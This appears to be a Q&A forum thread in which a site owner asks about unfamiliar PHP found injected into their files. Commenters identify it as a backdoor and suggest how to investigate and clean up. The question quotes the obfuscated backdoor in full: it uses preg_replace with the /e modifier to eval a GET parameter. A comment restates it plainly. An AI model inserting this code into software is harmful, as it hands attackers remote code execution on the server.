# undesirable php code appeared on some of my scripts

Tags: php, wordpress, code-injection

i have system on a regular hosting plan, the company didn't have the money to acquire a cloud plan so i have used this to starting, and they are now planning to change to a dedicated service.

Its a php + mysql simple system do track some users and generate mailing lists and some other things.

The problem is that in some of the files i've seen a code that i haven't typed... i couldn't understand what the code is about so i'm here to show you:

```
$khg= '_'."GE".'T';if (!empty(${$khg}['15'])) preg_replace('~.*~e', "e".'V'.'al($'.$khg.'["15"])','');
```

does anyome knows what this is about?

ps: the hosting also have a wordpress (the company main website). Researching i have seen that this could be some php injection using a wordpress failure (on some of the wordpress files i've seen the code too). But i haven't found much information...

Thank you all in advance!

Comment: That looks like injected malware. Definitely trying to eval() a query string, and hide that it's doing so.

Comment: You've been hacked.  You need to figure out how they got it and close that backdoor, and clean out all your files.  Compare to a known untampered backup.

Comment: Thank you for your quick answer! And how could them write direct into the php code since the hosting does not registered any invasions?

Comment: You're really going to want to look through your access logs for `?15=`. That'll be part of a larger string similar to `index.php?15=arbitraryphpcodegoeshere`. Should give you some insight into what someones been doing. The concerning code is `eval($_GET['15']);`

Answer (score 3, accepted):

There are a variety of ways your site could have been compromised:

- sql injection
- password leak
- malware on the machine that had the FTP password to the account

There's no way of knowing exactly how without more information, but these are pretty common compromise vectors.

You said you have a "simple PHP + MySQL system" that does a task.  Take a look at all the places in the PHP code where you process inputs.  Are you sanitizing them? (You can do a Google search to learn more about this.) Even ONE unsanitized input represents a potential back door for a bad guy.

Once you clean out your code, upgrade Wordpress, etc. remember to do the remaining cleanup related to passwords:

- change your database access password (and userid)
- change the "admin" userid and password if your mailing list system has one.
- change your FTP password
- etc.

Comment: thank you very much! i'll be checking all of those factors! Thanks again!